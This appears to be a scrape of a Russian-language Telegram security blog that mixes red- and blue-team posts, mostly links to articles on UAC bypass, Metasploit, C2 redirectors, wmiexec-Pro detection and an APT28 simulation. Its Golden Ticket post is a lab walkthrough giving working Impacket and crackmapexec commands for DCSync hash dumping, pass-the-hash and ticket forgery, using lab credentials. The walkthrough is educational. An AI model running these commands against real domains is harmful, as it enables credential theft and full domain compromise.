В новый год с новым названием!🐱
Новогодние праздники прошли, и, значит, самое время возвращаться к работе.
Ещё с самого начала существования канала (когда он был своеобразным "справочником" для 5 человек) я планировал сменить название и аватар, но всё никак не доходили руки. Постепенно аудитория расширялась, изменились тематика и контент, но название оставалось прежним.
Вчера было принято волевое решение всё изменить, и отныне этот блог носит название "Purple Chronicles", отсылая к пути моего ИБ-развития, объединяя темы наступательной🔓 и оборонительной безопасности🛡
Новогодние праздники прошли, и, значит, самое время возвращаться к работе.
Ещё с самого начала существования канала (когда он был своеобразным "справочником" для 5 человек) я планировал сменить название и аватар, но всё никак не доходили руки. Постепенно аудитория расширялась, изменились тематика и контент, но название оставалось прежним.
Вчера было принято волевое решение всё изменить, и отныне этот блог носит название "Purple Chronicles", отсылая к пути моего ИБ-развития, объединяя темы наступательной
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍10
"Как обойти UAC?"
Такой вопрос может возникнуть в тот момент, когда у нас есть шелл на атакуемой машине, скомпрометированный пользователь входит в административную группу, но попытка выполнить любое привилегированное действие приводит к ошибке "Отказано в доступе"
В этой статье мы поговорим про UAC чуть подробнее и рассмотрим классический способ его обхода при помощи fodhelper.exe как с отключенным, так и с работающим Windows Defender
Также познакомимся с одним из способов мониторинга и обнаружения вредоносной активности на примере MP SIEM
https://telegra.ph/UAC-bypass-01-12
Если вы ничего не слышали про UAC и не понимаете, о чем идёт речь, то не переживайте: необходимый теоретический материал приведён в начале статьи.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
UAC bypass with fodhelper.exe vs Windows Defender
Всем привет! Сегодня мы разберёмся с методикой обхода UAC при помощи утилиты fodhelper.exe, рассмотрим несколько способов при отключенном Windows Defender, а также усложним задачу и обманем защитник Windows, приправив всё капелькой теории.
🔥8❤1
Forwarded from oh, no - exception!
И вот, мной представлена статья про легитимные процессы Windows. Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.
А вот, собственно, и сама статья:
Галопом по Европам: Легитимные процессы Windows на пальцах
@exc3pt10n
А вот, собственно, и сама статья:
Галопом по Европам: Легитимные процессы Windows на пальцах
@exc3pt10n
Хабр
Галопом по Европам: Легитимные процессы Windows на пальцах
В этой статье моей целью будет быстро и понятно внести памятку о легитимных процессах Windows. Немного расскажу, какой процесс за что отвечает, какие нормальные свойства имеют процессы, и приправлю...
👍4❤3❤🔥2
oh, no - exception!
И вот, мной представлена статья про легитимные процессы Windows. Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно. А вот, собственно, и сама статья: Галопом по…
У каждого начинающего аналитика SOC, который изучает события с ID 1 или 4688 в любимой SIEM-системе (🖼️ 🖼️ 🔴 ), могут начать трястись руки от увиденного.
- Что из наблюдаемого норма?
- Как отличить аномалию от обычной активности системных процессов Windows?
- Кто такие эти ваши svchost и почему их так много?
@exc3pt10n спешит на помощь с крутейшей статьёй, где кратко разобраны основные системные процессы ОС Windows, их назначение, свойства (родитель, время запуска), а по некоторым приведена интересная и полезная информация🖼️
Смело забираем себе и обучаем L1!
- Что из наблюдаемого норма?
- Как отличить аномалию от обычной активности системных процессов Windows?
- Кто такие эти ваши svchost и почему их так много?
@exc3pt10n спешит на помощь с крутейшей статьёй, где кратко разобраны основные системные процессы ОС Windows, их назначение, свойства (родитель, время запуска), а по некоторым приведена интересная и полезная информация
Смело забираем себе и обучаем L1!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14
https://telegra.ph/Metasploit-Framework-101-12-26
Этот материал подойдёт для тех, кто никогда не работал с MSF или просто хочет познакомиться с ним получше: здесь мы поговорим об основных возможностях фрэймворка, поработаем с генератором полезных нагрузок, а для практического примера проэксплуатируем уязвимый к CVE-2017-0144 (EternalBlue) Windows Server
Но это не всё! В статье также рассмотрены простой вариант закрепления в Windows через модуль постэксплуатации, два способа повышения простого шелла до оболочки Meterpreter, а также способы дампа SAM и атаки DCSync при помощи модуля Kiwi🥝
#c2 #заметки #обучающий
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Metasploit Framework 101
Всем привет! Сегодня мы чуть подробнее познакомимся с фрэймворком Metasploit, его консолью и инструментом msfvenom, а также посмотрим на него в действии.
👍7❤4 1 1
Не так давно в ходе работы нашёл очень полезный для синих команд репозиторий, содержащий примеры Command & Control (C&C, C2) трафика различных вредоносных платформ☁️
https://github.com/silence-is-best/c2db
Здесь представлена довольно большая база знаний, которая уже не раз помогла мне в правильной категоризации вредоносного ПО, для которого в IDS нет явно определяющих сигнатур☑
#блютим #DFIR
https://github.com/silence-is-best/c2db
Здесь представлена довольно большая база знаний, которая уже не раз помогла мне в правильной категоризации вредоносного ПО, для которого в IDS нет явно определяющих сигнатур
#блютим #DFIR
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - silence-is-best/c2db: c2 traffic
c2 traffic. Contribute to silence-is-best/c2db development by creating an account on GitHub.
👍8🔥5❤1❤🔥1 1 1
https://telegra.ph/Detecting-wmiexec-Pro-10-28
Разбираем замечательную утилиту wmiexec-Pro, которая приходит на помощь, когда на целевом хосте закрыты SMB, WinRM и RDP. Утилита представляет собой усовершенствованную версию скрипта
wmiexec.py
из набора ImpacketКрасным командам советую взять на вооружение
А все начиналось с whoami as a SYSTEM...
#пентест #блютим #DFIR
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Detecting wmiexec-Pro
Всем привет! Сегодня мы познакомимся с интересным инструментом wmiexec-Pro, расширяющим возможности wmiexec.py из набора Impacket, и научимся находить следы его использования в сетевом трафике и на хосте.
❤7👍4🔥3 3 2 2
Forwarded from Cyber Media
🔥 Обзор платформ для практического обучения: направления Offensive и Defensive
В современном цифровом мире безопасность стала одной из наиболее приоритетных задач для организаций и частных лиц. Каждый день появляются новые угрозы, требующие постоянного повышения уровня защиты. И лучше всего это делать на практике.
➡️ В новой статье на сайте сделали обзор ключевых платформ, предназначенных для практики в направлениях Offensive Security — Hack The Box, PortSwigger Academy, TryHackMe, Root-Me и Defensive Security — Defbox, Letsdefend, Defendtheweb, Cyberdefenders.
Отдельно благодарим всех экспертов за уделенное время.
В современном цифровом мире безопасность стала одной из наиболее приоритетных задач для организаций и частных лиц. Каждый день появляются новые угрозы, требующие постоянного повышения уровня защиты. И лучше всего это делать на практике.
Отдельно благодарим всех экспертов за уделенное время.
Please open Telegram to view this post
VIEW IN TELEGRAM
Cyber Media
🔥 Обзор платформ для практического обучения: направления Offensive и Defensive В современном цифровом мире безопасность стала одной из наиболее приоритетных задач для организаций и частных лиц. Каждый день появляются новые угрозы, требующие постоянного повышения…
В мире, где технологии развиваются с огромной скоростью, защита информационных систем становятся все более критичной задачей. Роль ИБ-специалистов становится ключевой в противодействии актуальным киберугрозам👺
Однако, сами по себе знания и навыки, которыми обладают специалисты после ВУЗа, могут потерять свою актуальность уже завтра (если вообще актуальны). Чтобы быть на передовой, необходимо постоянно совершенствовать навыки, изучать новейшие угрозы и технологии, адаптироваться к меняющемуся киберпространству. В сфере информационной безопасности постоянное обучение становится неотъемлемой частью успеха, а стремление развивать профессиональные навыки — важным качеством хорошего специалиста💻
Совместно с коллегами и Cyber Media мы подготовили обзор площадок, которые я считаю ключевыми в освоении различных направлений ИБ: для кого-то они станут входным билетом в практическую безопасность, а для кого-то — новым испытанием на пути профессионального развития
Однако, сами по себе знания и навыки, которыми обладают специалисты после ВУЗа, могут потерять свою актуальность уже завтра (если вообще актуальны). Чтобы быть на передовой, необходимо постоянно совершенствовать навыки, изучать новейшие угрозы и технологии, адаптироваться к меняющемуся киберпространству. В сфере информационной безопасности постоянное обучение становится неотъемлемой частью успеха, а стремление развивать профессиональные навыки — важным качеством хорошего специалиста
Совместно с коллегами и Cyber Media мы подготовили обзор площадок, которые я считаю ключевыми в освоении различных направлений ИБ: для кого-то они станут входным билетом в практическую безопасность, а для кого-то — новым испытанием на пути профессионального развития
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥4 2 2
Cyber Media
🔥 Обзор платформ для практического обучения: направления Offensive и Defensive В современном цифровом мире безопасность стала одной из наиболее приоритетных задач для организаций и частных лиц. Каждый день появляются новые угрозы, требующие постоянного повышения…
TryHackMe — идеальная точка входа для начинающего специалиста
Она не требует специальных знаний и способна познакомить со всеми основными направлениями ИБ: RedTeam, пентест (как веб, так и инфраструктурный), BlueTeam (SOC, security engineering, malware analysis), а со вчерашнего дня даже DevSecOps
THM даёт возможность попробовать себя в каждом из них и помогает определиться с выбором дальнейшего направления развития.
Однако, если у вас уже есть некоторый бэкграунд и вы хотите развиваться вглубь, то:
Уверен, что каждый найдет себе платформу по душе и будет с огромным стремлением осваивать новые горизонты
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21 5❤🔥2
https://telegra.ph/C2-Redirector-01-26
Использование C&C редиректора — приём, которым красные команды могут пользоваться для сокрытия своей C2-инфраструктуры, а злоумышленники — для введения в заблуждение специалистов SOC
Сегодня мы поговорим о преимуществах этого метода и посмотрим на него в действии: поднимем небольшую лабораторию, используя в качестве C2-фрэймворка MetaSploit
Не обойдем стороной и анализ трафика, который мы будем видеть в сети
#c2 #обучающий
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
C2 Redirector
Всем привет! Сегодня мы познакомимся с одним из методов сокрытия C2-сервера за промежуточным узлом, называемым C2 Redirector. Техника сокрытия позволит избежать быстрого обнаружения управляющего сервера вашей C2-инфраструктуы и позволит затруднить анализ…
🔥7👍4 1
🎫Немного о Golden Ticket🎫
Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩💻 :
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен.Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
После обновления выпустить золотой билет можно следующей командой:
При этом обратная совместимость со старым PAC так же останется:
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи
Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
apt install python3-impacket
После обновления выпустить золотой билет можно следующей командой:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser
При этом обратная совместимость со старым PAC так же останется:
python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4
# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt
# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute
# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova
# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts
# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/[email protected] -k -no-pass
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи
amaslova
!Please open Telegram to view this post
VIEW IN TELEGRAM
👍13 3❤2 2 1 1 1
Занимательная история про Kerberoasting от имени пользователя с отключённой преаутентификацией без знания его пароля.
Я раньше неоднократно задавался таким же вопросом, но смущало то, что без сессионного ключа осуществить атаку казалось невозможным. Однако мир Kerberos и AD удивителен🖼️
Синие команды уже настраивают детекты на странный sname в AS-REQ?
Я раньше неоднократно задавался таким же вопросом, но смущало то, что без сессионного ключа осуществить атаку казалось невозможным. Однако мир Kerberos и AD удивителен
Синие команды уже настраивают детекты на странный sname в AS-REQ?
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Атака Kerberoasting без пароля пользователя — миф, или новая реальность?
Всем привет! Меня зовут Алексей, я работаю в компании «Визум», и занимаюсь тестированием на проникновение, направления классические – инфраструктура и веб. Данную статью меня сподвиг написать мой друг...
❤🔥14 3👍1 1 1
Вот и прошел долгожданный PHDays 🔴
Большое спасибо организаторам за такой масштабный фестиваль, это было действительно впечатляюще!
Спасибо тем, кто составил компанию эти 4 дня: ребята, вы крутые! С кем-то я лично встретился впервые, но вы наполнили и так насыщенные дни хорошим настроением и позитивом (действительно Positive Hack Days).
Большое спасибо экспертам за интереснейшие выступления, Defense и Evasion отмечу особенно)
Горд за наших ребят с FEFU: впервые поучаствовав в Кибербитве в рамках Standoff👨💻 , они заняли места сразу на двух пьедесталах, как за команду красных, так и за защитников.
Уверен, что обязательно вернусь в следующем году!
Большое спасибо организаторам за такой масштабный фестиваль, это было действительно впечатляюще!
Спасибо тем, кто составил компанию эти 4 дня: ребята, вы крутые! С кем-то я лично встретился впервые, но вы наполнили и так насыщенные дни хорошим настроением и позитивом (действительно Positive Hack Days).
Большое спасибо экспертам за интереснейшие выступления, Defense и Evasion отмечу особенно)
Горд за наших ребят с FEFU: впервые поучаствовав в Кибербитве в рамках Standoff
Уверен, что обязательно вернусь в следующем году!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19👍5❤3
Forwarded from PurpleBear (Vadim Shelest)
Анализ TTPs APT группировок на основе TI отчетов, а также разработка и тестирование атомарных тест-кейсов для реализуемых сценариев всегда занимает определенное время на этапе подготовки к проведению
Автор детально разбирает отчеты и публикует готовый план и необходимые инструменты для проведения симуляции сценария в формате Purple Teaming.
На примере последнего - Fancy Bear APT28 Adversary Simulation:
🟣 Create dll downloads files through base64, This is to download two files the first is (dfsvc.dll) the second is (Stager.dll)
🟣 Exploiting CVE-2021-40444 to inject the DLL file into Word File and create an execution for DLL by opening Word File
🟣 Word File is running and the actual payload is downloaded through DLLDownloader.dll and we have two files Stager.dll and dfsvc.dll
🟣 The Stager decrypts the actual payload and runs it which in turn is responsible for command and control
🟣 Data exfiltration over OneDrive API C2. This integrates OneDrive API functionality to facilitate communication between the compromised system and the attacker-controlled server thereby potentially hiding the traffic within legitimate OneDrive communication
🟣 Get Command and Control through payload uses the OneDrive API to upload data including command output to OneDrive, the payload calculates the CRC32 checksum of the MachineGuid and includes it in the communication with the server for identification purposes
В итоге получается готовый сценарий, который можно кастомизировать и использовать для проведения
Purple Teaming
. Поэтому мы всегда стараемся сначала найти нормальную аналитику с техническими подробностями, без маркетинговой воды и "highly sophisticated" формулировок😎 Недавно мне на глаза попался очень полезный репозиторий, который хотелось бы порекомендовать в этой заметке.Автор детально разбирает отчеты и публикует готовый план и необходимые инструменты для проведения симуляции сценария в формате Purple Teaming.
На примере последнего - Fancy Bear APT28 Adversary Simulation:
🟣 Create dll downloads files through base64, This is to download two files the first is (dfsvc.dll) the second is (Stager.dll)
🟣 Exploiting CVE-2021-40444 to inject the DLL file into Word File and create an execution for DLL by opening Word File
🟣 Word File is running and the actual payload is downloaded through DLLDownloader.dll and we have two files Stager.dll and dfsvc.dll
🟣 The Stager decrypts the actual payload and runs it which in turn is responsible for command and control
🟣 Data exfiltration over OneDrive API C2. This integrates OneDrive API functionality to facilitate communication between the compromised system and the attacker-controlled server thereby potentially hiding the traffic within legitimate OneDrive communication
🟣 Get Command and Control through payload uses the OneDrive API to upload data including command output to OneDrive, the payload calculates the CRC32 checksum of the MachineGuid and includes it in the communication with the server for identification purposes
В итоге получается готовый сценарий, который можно кастомизировать и использовать для проведения
Purple Teaming
.GitHub
GitHub - S3N4T0R-0X0/APT28-Adversary-Simulation: This is a simulation of attack by Fancy Bear group (APT28) targeting high-ranking…
This is a simulation of attack by Fancy Bear group (APT28) targeting high-ranking government officials Western Asia and Eastern Europe - S3N4T0R-0X0/APT28-Adversary-Simulation
🔥4❤2❤🔥2🤪1 1